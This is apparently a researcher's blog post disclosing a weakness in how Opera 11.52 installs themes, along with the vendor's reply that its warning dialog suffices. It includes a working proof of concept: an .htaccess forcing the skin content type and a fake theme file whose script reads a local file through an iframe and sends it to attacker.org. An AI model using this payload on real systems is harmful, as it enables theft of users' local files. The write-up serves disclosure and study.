sneak

Opera allows the user to change the browser's theme by downloading a compressed file containing all the useful information (images, ini files).
I tried to take a look at it after reading that Opera 12 will introduce a new themes system, which will make very very simple customizations; so I discovered a weird behaviour when Opera accepts a new theme, I mean, it does not perform any file extension check and it accepts bogus data within the theme. It just checks that the file starts with a certain "header" like the following:

[Info]
Name=x
Author=x
Version=1


I tried to exploit this successfully ( - it may lead to local file stealing), but this is not properly a Opera security issue because it requires some assumptions (social engineering) and the attacker should be able to convince the victim into clicking on yes within a "Potential Security Risk" dialog that Opera correctly prompts. Just take in mind that the attack should be very very simple, and yeah, I'm pretty sure that a fancy and cool theme will convince any user into accepting its installation!

I reported this to Opera, but they did not consider it as a security issue because several potentially harmful functions are protected by dialogs, and according to them this is considered sufficient. Since the installation of a new theme from an untrusted domain will prompt the user asking him whether he wants to really do so, Opera design is leaving the choice of being exploited to the user. Actually they consider as trusted just web sites managed from Opera Software in terms of skin, extensions, widgets, so if you try to host a personal themes mirror then the browser will alert the user at any time he is going to install something (skin, extensions, widgets). This is fine and this design can be considered acceptable in terms of security. At the end of the day Opera has the right protection against attacks like this, but the user should be completely aware of what he is going to install from untrusted domains.

I'm completely aware that this stuff is similar to the possibility for the attacker to make the victim download an HTML file and open it, but I suppose it's more likely the user downloads a nice theme instead of accepting a completely transparent download of an HTML file. Furthermore you could make the user dowload a theme which is an exe file, he could not be able to understand it because the filename.ext is not reflected in the dialog. Opera will also show a progress bar indicating the theme installation process and this will make the user trust it.

Analysis:

Let's try to forge an HTML file as a valid theme and let's serve it with the proper content-type (application/x-opera-configuration-skin).

· skin2.html

[Info]
Name=sneak
Author=@sneak_
Version=1

· .htaccess

<FilesMatch skin2.html>
ForceType application/x-opera-configuration-skin
</FilesMatch>


Now the user should be convinced in downloading the theme. Opera will alert the above mentioned "Potential Security Risk" dialog, if the user will accept it then he will have a new "theme" in an almost predictable location:
C:\users\[user]\AppData\Roaming\Opera\Opera\skin on Windows.
Here comes the core, the victim should be convinced into opening the local file, no redirections are actually working (Java Applets, Flash), so the most effective way to proceed is asking him into making a drag and drop operation in the address bar. I suppose you can do better by employing a PDF file which points to the local file, but again an alert dialog will prompt.

So considering the fact the Opera blocks xmlhttprequest from local files by default, I should use a simple trick to bypass this problem - I'm using an iframe in order to access a target local file content (Opera can read unrelated files), then I'm causing a 404 to make the attacker server log the file content. (For detailed info: 1, 2).

The malicious theme should be as follows:

· skin2.html

# This file describes the skin for the Opera browser, yeah for sure! :D

[Info]
Name=sneak
Author=@sneak_
Version=2

<hr />
<script>
function send_to_theAttacker(content) {
x=document.createElement("iframe");
x.src="http://attacker.org/"+content;
document.body.appendChild(x);
}

z=document.createElement("iframe");
z.src="file://localhost/C:/[LOCALFILE_TOSTEAL]";
z.onload=function(){ k = frames[0].document.body.innerHTML; send_to_theAttacker(k); };
document.body.appendChild(z);
</script>


In this way the attacker is able to steal any file on the victim filesystem! You can also serve a bat file as theme which starts the calc.exe, but again the user will be prompted by a dialog asking him whether he wants to run it.

Conclusion:

Here follows the attack steps:
1. make the victim download the fake theme, which contains a malicious payload that steals a secret file from the local file system and give it to the attacker
2. this latter will be located in a predictable location, knowing the machine username
3. make the victim visit the local page (hard, you can do that with PDF or drag and drop of a link in the address bar)

There are just two limitations:
1. the attacker should know the windows username;
2. the redirect to a local file from an http page is not possible without user interaction.

This stuff works in Opera 11.52 (tested on Win32).

Video:

Here you can find a video for better understanding.